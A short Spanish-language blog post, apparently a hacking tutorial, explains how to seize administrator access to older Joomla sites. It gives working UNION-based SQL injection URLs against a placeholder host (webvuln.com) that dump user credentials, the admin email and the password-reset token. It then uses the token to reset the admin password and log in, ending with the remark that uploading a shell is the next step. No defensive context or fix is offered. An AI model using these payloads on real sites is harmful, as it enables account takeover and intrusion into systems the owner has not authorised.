_________________________________________________________________
Después de varias semanas de inactividad les traigo este topic que escribo junto a Mandrake Murdock en el cual explicamos un caso con el que nos encontramos el día de hoy y nos ha parecido tan interesante por lo cual hoy escribiremos este post.
Resulta que encontramos una Sqli en un joomla:
luego seguimos con la injection y nos encontramos con lo siguiente:
http://webvuln.com/libros/index.php?id=999999999%20union%20all%20select%201,concat(username,0x3a,password),3+FROM+jos_users--
El password no estaba por ninguna base de datos de hashes ni nada era muy complicado sacarla entonces como hacemos... en la versiones antiguas de joomla en el momento que olvidas tu contraseña, se envia un email a tu correo con un token ese token lo ingresas en un textbox y te permite ingresar una contraseña nueva, este token se guarda en la base de datos por lo cual nosotros lo que podríamos hacer es lo siguiente:
Vamos a este link: http://webvuln.com/index.php?option=com_user&view=reset entonces te va a pedir que ingreses un correo, ahi pones el correo del administrador:
http://webvuln.com/libros/index.php?id=999999999%20union%20all%20select%201,email,3+FROM+jos_users--
y luego vamos a la base de datos y buscamos un nuevo campo que se ha creado con el token del cual previamente hemos hablado.
http://webvuln.com/libros/index.php?id=999999999%20union%20all%20select%201,activation,3+FROM+jos_users--
Copiamos el token que se nos ha generado y lo pegamos en:
http://webvuln.com/index.php?option=com_user&view=reset&layout=confirm
Le damos click en enviar y luego podremos ingresar una nueva contraseña la que querramos... luego vamos a
http://webvuln.com/administrator/
y listo nos logueamos con el usuario admin y con la password que pusimos antes... y ya estamos a un pequeño pasa de como subir nuestra shell...
fuente:
http://www.seguridadblanca.com/2012/07/ganando-admin-en-joomla-mediante-token.html
Entradas
No hay comentarios:
Publicar un comentario